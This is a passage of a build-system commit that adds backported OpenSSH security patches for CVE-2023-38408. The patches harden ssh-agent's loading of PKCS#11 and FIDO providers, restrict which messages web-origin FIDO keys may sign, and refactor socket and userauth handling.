+index 3a31d5c..8a107e4 100644
+--- a/misc.c
++++ b/misc.c
+@@ -28,6 +28,7 @@
+
+ #include <sys/types.h>
+ #include <sys/ioctl.h>
++#include <sys/mman.h>
+ #include <sys/socket.h>
+ #include <sys/stat.h>
+ #include <sys/time.h>
+@@ -41,6 +42,9 @@
+ #ifdef HAVE_POLL_H
+ #include <poll.h>
+ #endif
++#ifdef HAVE_NLIST_H
++#include <nlist.h>
++#endif
+ #include <signal.h>
+ #include <stdarg.h>
+ #include <stdio.h>
+@@ -2266,3 +2270,76 @@ ssh_signal(int signum, sshsig_t handler)
+ }
+ return osa.sa_handler;
+ }
++
++
++/*
++ * Returns zero if the library at 'path' contains symbol 's', nonzero
++ * otherwise.
++ */
++int
++lib_contains_symbol(const char *path, const char *s)
++{
++#ifdef HAVE_NLIST_H
++ struct nlist nl[2];
++ int ret = -1, r;
++
++ memset(nl, 0, sizeof(nl));
++ nl[0].n_name = xstrdup(s);
++ nl[1].n_name = NULL;
++ if ((r = nlist(path, nl)) == -1) {
++ error("%s: nlist failed for %s", __func__, path);
++ goto out;
++ }
++ if (r != 0 || nl[0].n_value == 0 || nl[0].n_type == 0) {
++ error("%s: library %s does not contain symbol %s", __func__, path, s);
++ goto out;
++ }
++ /* success */
++ ret = 0;
++ out:
++ free(nl[0].n_name);
++ return ret;
++#else /* HAVE_NLIST_H */
++ int fd, ret = -1;
++ struct stat st;
++ void *m = NULL;
++ size_t sz = 0;
++
++ memset(&st, 0, sizeof(st));
++ if ((fd = open(path, O_RDONLY)) < 0) {
++ error("%s: open %s: %s", __func__, path, strerror(errno));
++ return -1;
++ }
++ if (fstat(fd, &st) != 0) {
++ error("%s: fstat %s: %s", __func__, path, strerror(errno));
++ goto out;
++ }
++ if (!S_ISREG(st.st_mode)) {
++ error("%s: %s is not a regular file", __func__, path);
++ goto out;
++ }
++ if (st.st_size < 0 ||
++ (size_t)st.st_size < strlen(s) ||
++ st.st_size >= INT_MAX/2) {
++ error("%s: %s bad size %lld", __func__, path, (long long)st.st_size);
++ goto out;
++ }
++ sz = (size_t)st.st_size;
++ if ((m = mmap(NULL, sz, PROT_READ, MAP_PRIVATE, fd, 0)) == MAP_FAILED ||
++ m == NULL) {
++ error("%s: mmap %s: %s", __func__, path, strerror(errno));
++ goto out;
++ }
++ if (memmem(m, sz, s, strlen(s)) == NULL) {
++ error("%s: %s does not contain expected string %s", __func__, path, s);
++ goto out;
++ }
++ /* success */
++ ret = 0;
++ out:
++ if (m != NULL && m != MAP_FAILED)
++ munmap(m, sz);
++ close(fd);
++ return ret;
++#endif /* HAVE_NLIST_H */
++}
+diff --git a/misc.h b/misc.h
+index 4a05db2..3f9f4db 100644
+--- a/misc.h
++++ b/misc.h
+@@ -86,6 +86,7 @@ const char *atoi_err(const char *, int *);
+ int parse_absolute_time(const char *, uint64_t *);
+ void format_absolute_time(uint64_t, char *, size_t);
+ int path_absolute(const char *);
++int lib_contains_symbol(const char *, const char *);
+
+ void sock_set_v6only(int);
+
+diff --git a/ssh-pkcs11.c b/ssh-pkcs11.c
+index b56a41b..639a6f7 100644
+--- a/ssh-pkcs11.c
++++ b/ssh-pkcs11.c
+@@ -1499,6 +1499,10 @@ pkcs11_register_provider(char *provider_id, char *pin,
+ __func__, provider_id);
+ goto fail;
+ }
++ if (lib_contains_symbol(provider_id, "C_GetFunctionList") != 0) {
++ error("provider %s is not a PKCS11 library", provider_id);
++ goto fail;
++ }
+ /* open shared pkcs11-library */
+ if ((handle = dlopen(provider_id, RTLD_NOW)) == NULL) {
+ error("dlopen %s failed: %s", provider_id, dlerror());
+diff --git a/ssh-sk.c b/ssh-sk.c
+index 5ff9381..9df12cc 100644
+--- a/ssh-sk.c
++++ b/ssh-sk.c
+@@ -119,10 +119,12 @@ sshsk_open(const char *path)
+ #endif
+ return ret;
+ }
+- if ((ret->dlhandle = dlopen(path, RTLD_NOW)) == NULL) {
+- error("Provider \"%s\" dlopen failed: %s", path, dlerror());
++ if (lib_contains_symbol(path, "sk_api_version") != 0) {
++ error("provider %s is not an OpenSSH FIDO library", path);
+ goto fail;
+ }
++ if ((ret->dlhandle = dlopen(path, RTLD_NOW)) == NULL)
++ fatal("Provider \"%s\" dlopen failed: %s", path, dlerror());
+ if ((ret->sk_api_version = dlsym(ret->dlhandle,
+ "sk_api_version")) == NULL) {
+ error("Provider \"%s\" dlsym(sk_api_version) failed: %s",
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch
new file mode 100644
index 0000000000..5e8040c9bf
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch
@@ -0,0 +1,34 @@
+From 0862f338941bfdfb2cadee87de6d5fdca1b8f457 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Wed, 19 Jul 2023 13:55:53 +0000
+Subject: [PATCH 04/12] upstream: terminate process if requested to load a
+ PKCS#11 provider that isn't a PKCS#11 provider; from / ok markus@
+
+OpenBSD-Commit-ID: 39532cf18b115881bb4cfaee32084497aadfa05c
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/892506b13654301f69f9545f48213fc210e5c5cc]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-pkcs11.c | 6 ++----
+ 1 file changed, 2 insertions(+), 4 deletions(-)
+
+diff --git a/ssh-pkcs11.c b/ssh-pkcs11.c
+index 639a6f7..7530acc 100644
+--- a/ssh-pkcs11.c
++++ b/ssh-pkcs11.c
+@@ -1508,10 +1508,8 @@ pkcs11_register_provider(char *provider_id, char *pin,
+ error("dlopen %s failed: %s", provider_id, dlerror());
+ goto fail;
+ }
+- if ((getfunctionlist = dlsym(handle, "C_GetFunctionList")) == NULL) {
+- error("dlsym(C_GetFunctionList) failed: %s", dlerror());
+- goto fail;
+- }
++ if ((getfunctionlist = dlsym(handle, "C_GetFunctionList")) == NULL)
++ fatal("dlsym(C_GetFunctionList) failed: %s", dlerror());
+ p = xcalloc(1, sizeof(*p));
+ p->name = xstrdup(provider_id);
+ p->handle = handle;
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch
new file mode 100644
index 0000000000..0ddbdc68d4
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch
@@ -0,0 +1,194 @@
+From a6cee3905edf070c0de135d3f2ee5b74da1dbd28 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Tue, 26 May 2020 01:26:58 +0000
+Subject: [PATCH 05/12] upstream: Restrict ssh-agent from signing web
+ challenges for FIDO
+
+keys.
+
+When signing messages in ssh-agent using a FIDO key that has an
+application string that does not start with "ssh:", ensure that the
+message being signed is one of the forms expected for the SSH protocol
+(currently pubkey authentication and sshsig signatures).
+
+This prevents ssh-agent forwarding on a host that has FIDO keys
+attached granting the ability for the remote side to sign challenges
+for web authentication using those keys too.
+
+Note that the converse case of web browsers signing SSH challenges is
+already precluded because no web RP can have the "ssh:" prefix in the
+application string that we require.
+
+ok markus@
+
+OpenBSD-Commit-ID: 9ab6012574ed0352d2f097d307f4a988222d1b19
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/0c111eb84efba7c2a38b2cc3278901a0123161b9]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 110 +++++++++++++++++++++++++++++++++++++++++++++++-----
+ 1 file changed, 100 insertions(+), 10 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index ceb348c..1794f35 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.255 2020/02/06 22:30:54 naddy Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.258 2020/05/26 01:26:58 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -77,6 +77,7 @@
+
+ #include "xmalloc.h"
+ #include "ssh.h"
++#include "ssh2.h"
+ #include "sshbuf.h"
+ #include "sshkey.h"
+ #include "authfd.h"
+@@ -167,6 +168,9 @@ static long lifetime = 0;
+
+ static int fingerprint_hash = SSH_FP_HASH_DEFAULT;
+
++/* Refuse signing of non-SSH messages for web-origin FIDO keys */
++static int restrict_websafe = 1;
++
+ static void
+ close_socket(SocketEntry *e)
+ {
+@@ -282,6 +286,80 @@ agent_decode_alg(struct sshkey *key, u_int flags)
+ return NULL;
+ }
+
++/*
++ * This function inspects a message to be signed by a FIDO key that has a
++ * web-like application string (i.e. one that does not begin with "ssh:").
++ * It checks that the message is one of those expected for SSH operations
++ * (pubkey userauth, sshsig, CA key signing) to exclude signing challenges
++ * for the web.
++ */
++static int
++check_websafe_message_contents(struct sshkey *key,
++ const u_char *msg, size_t len)
++{
++ int matched = 0;
++ struct sshbuf *b;
++ u_char m, n;
++ char *cp1 = NULL, *cp2 = NULL;
++ int r;
++ struct sshkey *mkey = NULL;
++
++ if ((b = sshbuf_from(msg, len)) == NULL)
++ fatal("%s: sshbuf_new", __func__);
++
++ /* SSH userauth request */
++ if ((r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* sess_id */
++ (r = sshbuf_get_u8(b, &m)) == 0 && /* SSH2_MSG_USERAUTH_REQUEST */
++ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* server user */
++ (r = sshbuf_get_cstring(b, &cp1, NULL)) == 0 && /* service */
++ (r = sshbuf_get_cstring(b, &cp2, NULL)) == 0 && /* method */
++ (r = sshbuf_get_u8(b, &n)) == 0 && /* sig-follows */
++ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* alg */
++ (r = sshkey_froms(b, &mkey)) == 0 && /* key */
++ sshbuf_len(b) == 0) {
++ debug("%s: parsed userauth", __func__);
++ if (m == SSH2_MSG_USERAUTH_REQUEST && n == 1 &&
++ strcmp(cp1, "ssh-connection") == 0 &&
++ strcmp(cp2, "publickey") == 0 &&
++ sshkey_equal(key, mkey)) {
++ debug("%s: well formed userauth", __func__);
++ matched = 1;
++ }
++ }
++ free(cp1);
++ free(cp2);
++ sshkey_free(mkey);
++ sshbuf_free(b);
++ if (matched)
++ return 1;
++
++ if ((b = sshbuf_from(msg, len)) == NULL)
++ fatal("%s: sshbuf_new", __func__);
++ cp1 = cp2 = NULL;
++ mkey = NULL;
++
++ /* SSHSIG */
++ if ((r = sshbuf_cmp(b, 0, "SSHSIG", 6)) == 0 &&
++ (r = sshbuf_consume(b, 6)) == 0 &&
++ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* namespace */
++ (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* reserved */
++ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* hashalg */
++ (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* H(msg) */
++ sshbuf_len(b) == 0) {
++ debug("%s: parsed sshsig", __func__);
++ matched = 1;
++ }
++
++ sshbuf_free(b);
++ if (matched)
++ return 1;
++
++ /* XXX CA signature operation */
++
++ error("web-origin key attempting to sign non-SSH message");
++ return 0;
++}
++
+ /* ssh2 only */
+ static void
+ process_sign_request2(SocketEntry *e)
+@@ -314,14 +392,20 @@ process_sign_request2(SocketEntry *e)
+ verbose("%s: user refused key", __func__);
+ goto send;
+ }
+- if (sshkey_is_sk(id->key) &&
+- (id->key->sk_flags & SSH_SK_USER_PRESENCE_REQD)) {
+- if ((fp = sshkey_fingerprint(key, SSH_FP_HASH_DEFAULT,
+- SSH_FP_DEFAULT)) == NULL)
+- fatal("%s: fingerprint failed", __func__);
+- notifier = notify_start(0,
+- "Confirm user presence for key %s %s",
+- sshkey_type(id->key), fp);
++ if (sshkey_is_sk(id->key)) {
++ if (strncmp(id->key->sk_application, "ssh:", 4) != 0 &&
++ !check_websafe_message_contents(key, data, dlen)) {
++ /* error already logged */
++ goto send;
++ }
++ if ((id->key->sk_flags & SSH_SK_USER_PRESENCE_REQD)) {
++ if ((fp = sshkey_fingerprint(key, SSH_FP_HASH_DEFAULT,
++ SSH_FP_DEFAULT)) == NULL)
++ fatal("%s: fingerprint failed", __func__);
++ notifier = notify_start(0,
++ "Confirm user presence for key %s %s",
++ sshkey_type(id->key), fp);
++ }
+ }
+ if ((r = sshkey_sign(id->key, &signature, &slen,
+ data, dlen, agent_decode_alg(key, flags),
+@@ -1214,7 +1298,7 @@ main(int ac, char **av)
+ __progname = ssh_get_progname(av[0]);
+ seed_rng();
+
+- while ((ch = getopt(ac, av, "cDdksE:a:P:t:")) != -1) {
++ while ((ch = getopt(ac, av, "cDdksE:a:O:P:t:")) != -1) {
+ switch (ch) {
+ case 'E':
+ fingerprint_hash = ssh_digest_alg_by_name(optarg);
+@@ -1229,6 +1313,12 @@ main(int ac, char **av)
+ case 'k':
+ k_flag++;
+ break;
++ case 'O':
++ if (strcmp(optarg, "no-restrict-websafe") == 0)
++ restrict_websafe = 0;
++ else
++ fatal("Unknown -O option");
++ break;
+ case 'P':
+ if (provider_whitelist != NULL)
+ fatal("-P option already specified");
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch
new file mode 100644
index 0000000000..ac494aab0b
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch
@@ -0,0 +1,73 @@
+From a5d845b7b42861d18f43e83de9f24c7374d1b458 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 18 Sep 2020 08:16:38 +0000
+Subject: [PATCH 06/12] upstream: handle multiple messages in a single read()
+
+PR#183 by Dennis Kaarsemaker; feedback and ok markus@
+
+OpenBSD-Commit-ID: 8570bb4d02d00cf70b98590716ea6a7d1cce68d1
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/52a03e9fca2d74eef953ddd4709250f365ca3975]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 19 +++++++++++++------
+ 1 file changed, 13 insertions(+), 6 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 1794f35..78f7268 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.258 2020/05/26 01:26:58 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.264 2020/09/18 08:16:38 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -853,8 +853,10 @@ send:
+ }
+ #endif /* ENABLE_PKCS11 */
+
+-/* dispatch incoming messages */
+-
++/*
++ * dispatch incoming message.
++ * returns 1 on success, 0 for incomplete messages or -1 on error.
++ */
+ static int
+ process_message(u_int socknum)
+ {
+@@ -908,7 +910,7 @@ process_message(u_int socknum)
+ /* send a fail message for all other request types */
+ send_status(e, 0);
+ }
+- return 0;
++ return 1;
+ }
+
+ switch (type) {
+@@ -952,7 +954,7 @@ process_message(u_int socknum)
+ send_status(e, 0);
+ break;
+ }
+- return 0;
++ return 1;
+ }
+
+ static void
+@@ -1043,7 +1045,12 @@ handle_conn_read(u_int socknum)
+ if ((r = sshbuf_put(sockets[socknum].input, buf, len)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+ explicit_bzero(buf, sizeof(buf));
+- process_message(socknum);
++ for (;;) {
++ if ((r = process_message(socknum)) == -1)
++ return -1;
++ else if (r == 0)
++ break;
++ }
+ return 0;
+ }
+
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch
new file mode 100644
index 0000000000..0dcf23ae17
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch
@@ -0,0 +1,125 @@
+From 653cc18c922fc387b3d3aa1b081c5e5283cce28a Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Tue, 26 Jan 2021 00:47:47 +0000
+Subject: [PATCH 07/12] upstream: use recallocarray to allocate the agent
+ sockets table;
+
+also clear socket entries that are being marked as unused.
+
+spinkle in some debug2() spam to make it easier to watch an agent
+do its thing.
+
+ok markus
+
+OpenBSD-Commit-ID: 74582c8e82e96afea46f6c7b6813a429cbc75922
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/1fe16fd61bb53944ec510882acc0491abd66ff76]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 20 ++++++++++++++++----
+ 1 file changed, 16 insertions(+), 4 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 78f7268..2635bc5 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.264 2020/09/18 08:16:38 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.269 2021/01/26 00:47:47 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -175,11 +175,12 @@ static void
+ close_socket(SocketEntry *e)
+ {
+ close(e->fd);
+- e->fd = -1;
+- e->type = AUTH_UNUSED;
+ sshbuf_free(e->input);
+ sshbuf_free(e->output);
+ sshbuf_free(e->request);
++ memset(e, '\0', sizeof(*e));
++ e->fd = -1;
++ e->type = AUTH_UNUSED;
+ }
+
+ static void
+@@ -249,6 +250,8 @@ process_request_identities(SocketEntry *e)
+ struct sshbuf *msg;
+ int r;
+
++ debug2("%s: entering", __func__);
++
+ if ((msg = sshbuf_new()) == NULL)
+ fatal("%s: sshbuf_new failed", __func__);
+ if ((r = sshbuf_put_u8(msg, SSH2_AGENT_IDENTITIES_ANSWER)) != 0 ||
+@@ -441,6 +444,7 @@ process_remove_identity(SocketEntry *e)
+ struct sshkey *key = NULL;
+ Identity *id;
+
++ debug2("%s: entering", __func__);
+ if ((r = sshkey_froms(e->request, &key)) != 0) {
+ error("%s: get key: %s", __func__, ssh_err(r));
+ goto done;
+@@ -467,6 +471,7 @@ process_remove_all_identities(SocketEntry *e)
+ {
+ Identity *id;
+
++ debug2("%s: entering", __func__);
+ /* Loop over all identities and clear the keys. */
+ for (id = TAILQ_FIRST(&idtab->idlist); id;
+ id = TAILQ_FIRST(&idtab->idlist)) {
+@@ -520,6 +525,7 @@ process_add_identity(SocketEntry *e)
+ u_char ctype;
+ int r = SSH_ERR_INTERNAL_ERROR;
+
++ debug2("%s: entering", __func__);
+ if ((r = sshkey_private_deserialize(e->request, &k)) != 0 ||
+ k == NULL ||
+ (r = sshbuf_get_cstring(e->request, &comment, NULL)) != 0) {
+@@ -667,6 +673,7 @@ process_lock_agent(SocketEntry *e, int lock)
+ static u_int fail_count = 0;
+ size_t pwlen;
+
++ debug2("%s: entering", __func__);
+ /*
+ * This is deliberately fatal: the user has requested that we lock,
+ * but we can't parse their request properly. The only safe thing to
+@@ -738,6 +745,7 @@ process_add_smartcard_key(SocketEntry *e)
+ struct sshkey **keys = NULL, *k;
+ Identity *id;
+
++ debug2("%s: entering", __func__);
+ if ((r = sshbuf_get_cstring(e->request, &provider, NULL)) != 0 ||
+ (r = sshbuf_get_cstring(e->request, &pin, NULL)) != 0) {
+ error("%s: buffer error: %s", __func__, ssh_err(r));
+@@ -818,6 +826,7 @@ process_remove_smartcard_key(SocketEntry *e)
+ int r, success = 0;
+ Identity *id, *nxt;
+
++ debug2("%s: entering", __func__);
+ if ((r = sshbuf_get_cstring(e->request, &provider, NULL)) != 0 ||
+ (r = sshbuf_get_cstring(e->request, &pin, NULL)) != 0) {
+ error("%s: buffer error: %s", __func__, ssh_err(r));
+@@ -962,6 +971,8 @@ new_socket(sock_type type, int fd)
+ {
+ u_int i, old_alloc, new_alloc;
+
++ debug("%s: type = %s", __func__, type == AUTH_CONNECTION ? "CONNECTION" :
++ (type == AUTH_SOCKET ? "SOCKET" : "UNKNOWN"));
+ set_nonblock(fd);
+
+ if (fd > max_fd)
+@@ -981,7 +992,8 @@ new_socket(sock_type type, int fd)
+ }
+ old_alloc = sockets_alloc;
+ new_alloc = sockets_alloc + 10;
+- sockets = xreallocarray(sockets, new_alloc, sizeof(sockets[0]));
++ sockets = xrecallocarray(sockets, old_alloc, new_alloc,
++ sizeof(sockets[0]));
+ for (i = old_alloc; i < new_alloc; i++)
+ sockets[i].type = AUTH_UNUSED;
+ sockets_alloc = new_alloc;
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch
new file mode 100644
index 0000000000..141c8113bf
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch
@@ -0,0 +1,315 @@
+From c30158ea225cf8ad67c3dcc88fa9e4afbf8959a7 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Tue, 26 Jan 2021 00:53:31 +0000
+Subject: [PATCH 08/12] upstream: more ssh-agent refactoring
+
+Allow confirm_key() to accept an additional reason suffix
+
+Factor publickey userauth parsing out into its own function and allow
+it to optionally return things it parsed out of the message to its
+caller.
+
+feedback/ok markus@
+
+OpenBSD-Commit-ID: 29006515617d1aa2d8b85cd2bf667e849146477e
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/e0e8bee8024fa9e31974244d14f03d799e5c0775]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 197 ++++++++++++++++++++++++++++++++++------------------
+ 1 file changed, 130 insertions(+), 67 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 2635bc5..7ad323c 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.269 2021/01/26 00:47:47 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.270 2021/01/26 00:53:31 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -216,15 +216,16 @@ lookup_identity(struct sshkey *key)
+
+ /* Check confirmation of keysign request */
+ static int
+-confirm_key(Identity *id)
++confirm_key(Identity *id, const char *extra)
+ {
+ char *p;
+ int ret = -1;
+
+ p = sshkey_fingerprint(id->key, fingerprint_hash, SSH_FP_DEFAULT);
+ if (p != NULL &&
+- ask_permission("Allow use of key %s?\nKey fingerprint %s.",
+- id->comment, p))
++ ask_permission("Allow use of key %s?\nKey fingerprint %s.%s%s",
++ id->comment, p,
++ extra == NULL ? "" : "\n", extra == NULL ? "" : extra))
+ ret = 0;
+ free(p);
+
+@@ -290,74 +291,133 @@ agent_decode_alg(struct sshkey *key, u_int flags)
+ }
+
+ /*
+- * This function inspects a message to be signed by a FIDO key that has a
+- * web-like application string (i.e. one that does not begin with "ssh:").
+- * It checks that the message is one of those expected for SSH operations
+- * (pubkey userauth, sshsig, CA key signing) to exclude signing challenges
+- * for the web.
++ * Attempt to parse the contents of a buffer as a SSH publickey userauth
++ * request, checking its contents for consistency and matching the embedded
++ * key against the one that is being used for signing.
++ * Note: does not modify msg buffer.
++ * Optionally extract the username and session ID from the request.
+ */
+ static int
+-check_websafe_message_contents(struct sshkey *key,
+- const u_char *msg, size_t len)
++parse_userauth_request(struct sshbuf *msg, const struct sshkey *expected_key,
++ char **userp, struct sshbuf **sess_idp)
+ {
+- int matched = 0;
+- struct sshbuf *b;
+- u_char m, n;
+- char *cp1 = NULL, *cp2 = NULL;
++ struct sshbuf *b = NULL, *sess_id = NULL;
++ char *user = NULL, *service = NULL, *method = NULL, *pkalg = NULL;
+ int r;
++ u_char t, sig_follows;
+ struct sshkey *mkey = NULL;
+
+- if ((b = sshbuf_from(msg, len)) == NULL)
+- fatal("%s: sshbuf_new", __func__);
++ if (userp != NULL)
++ *userp = NULL;
++ if (sess_idp != NULL)
++ *sess_idp = NULL;
++ if ((b = sshbuf_fromb(msg)) == NULL)
++ fatal("%s: sshbuf_fromb", __func__);
+
+ /* SSH userauth request */
+- if ((r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* sess_id */
+- (r = sshbuf_get_u8(b, &m)) == 0 && /* SSH2_MSG_USERAUTH_REQUEST */
+- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* server user */
+- (r = sshbuf_get_cstring(b, &cp1, NULL)) == 0 && /* service */
+- (r = sshbuf_get_cstring(b, &cp2, NULL)) == 0 && /* method */
+- (r = sshbuf_get_u8(b, &n)) == 0 && /* sig-follows */
+- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* alg */
+- (r = sshkey_froms(b, &mkey)) == 0 && /* key */
+- sshbuf_len(b) == 0) {
+- debug("%s: parsed userauth", __func__);
+- if (m == SSH2_MSG_USERAUTH_REQUEST && n == 1 &&
+- strcmp(cp1, "ssh-connection") == 0 &&
+- strcmp(cp2, "publickey") == 0 &&
+- sshkey_equal(key, mkey)) {
+- debug("%s: well formed userauth", __func__);
+- matched = 1;
+- }
++ if ((r = sshbuf_froms(b, &sess_id)) != 0)
++ goto out;
++ if (sshbuf_len(sess_id) == 0) {
++ r = SSH_ERR_INVALID_FORMAT;
++ goto out;
+ }
+- free(cp1);
+- free(cp2);
+- sshkey_free(mkey);
++ if ((r = sshbuf_get_u8(b, &t)) != 0 || /* SSH2_MSG_USERAUTH_REQUEST */
++ (r = sshbuf_get_cstring(b, &user, NULL)) != 0 || /* server user */
++ (r = sshbuf_get_cstring(b, &service, NULL)) != 0 || /* service */
++ (r = sshbuf_get_cstring(b, &method, NULL)) != 0 || /* method */
++ (r = sshbuf_get_u8(b, &sig_follows)) != 0 || /* sig-follows */
++ (r = sshbuf_get_cstring(b, &pkalg, NULL)) != 0 || /* alg */
++ (r = sshkey_froms(b, &mkey)) != 0) /* key */
++ goto out;
++ if (t != SSH2_MSG_USERAUTH_REQUEST ||
++ sig_follows != 1 ||
++ strcmp(service, "ssh-connection") != 0 ||
++ !sshkey_equal(expected_key, mkey) ||
++ sshkey_type_from_name(pkalg) != expected_key->type) {
++ r = SSH_ERR_INVALID_FORMAT;
++ goto out;
++ }
++ if (strcmp(method, "publickey") != 0) {
++ r = SSH_ERR_INVALID_FORMAT;
++ goto out;
++ }
++ if (sshbuf_len(b) != 0) {
++ r = SSH_ERR_INVALID_FORMAT;
++ goto out;
++ }
++ /* success */
++ r = 0;
++ debug("%s: well formed userauth", __func__);
++ if (userp != NULL) {
++ *userp = user;
++ user = NULL;
++ }
++ if (sess_idp != NULL) {
++ *sess_idp = sess_id;
++ sess_id = NULL;
++ }
++ out:
+ sshbuf_free(b);
+- if (matched)
+- return 1;
++ sshbuf_free(sess_id);
++ free(user);
++ free(service);
++ free(method);
++ free(pkalg);
++ sshkey_free(mkey);
++ return r;
++}
+
+- if ((b = sshbuf_from(msg, len)) == NULL)
+- fatal("%s: sshbuf_new", __func__);
+- cp1 = cp2 = NULL;
+- mkey = NULL;
+-
+- /* SSHSIG */
+- if ((r = sshbuf_cmp(b, 0, "SSHSIG", 6)) == 0 &&
+- (r = sshbuf_consume(b, 6)) == 0 &&
+- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* namespace */
+- (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* reserved */
+- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* hashalg */
+- (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* H(msg) */
+- sshbuf_len(b) == 0) {
+- debug("%s: parsed sshsig", __func__);
+- matched = 1;
+- }
++/*
++ * Attempt to parse the contents of a buffer as a SSHSIG signature request.
++ * Note: does not modify buffer.
++ */
++static int
++parse_sshsig_request(struct sshbuf *msg)
++{
++ int r;
++ struct sshbuf *b;
+
++ if ((b = sshbuf_fromb(msg)) == NULL)
++ fatal("%s: sshbuf_fromb", __func__);
++
++ if ((r = sshbuf_cmp(b, 0, "SSHSIG", 6)) != 0 ||
++ (r = sshbuf_consume(b, 6)) != 0 ||
++ (r = sshbuf_get_cstring(b, NULL, NULL)) != 0 || /* namespace */
++ (r = sshbuf_get_string_direct(b, NULL, NULL)) != 0 || /* reserved */
++ (r = sshbuf_get_cstring(b, NULL, NULL)) != 0 || /* hashalg */
++ (r = sshbuf_get_string_direct(b, NULL, NULL)) != 0) /* H(msg) */
++ goto out;
++ if (sshbuf_len(b) != 0) {
++ r = SSH_ERR_INVALID_FORMAT;
++ goto out;
++ }
++ /* success */
++ r = 0;
++ out:
+ sshbuf_free(b);
+- if (matched)
++ return r;
++}
++
++/*
++ * This function inspects a message to be signed by a FIDO key that has a
++ * web-like application string (i.e. one that does not begin with "ssh:").
++ * It checks that the message is one of those expected for SSH operations
++ * (pubkey userauth, sshsig, CA key signing) to exclude signing challenges
++ * for the web.
++ */
++static int
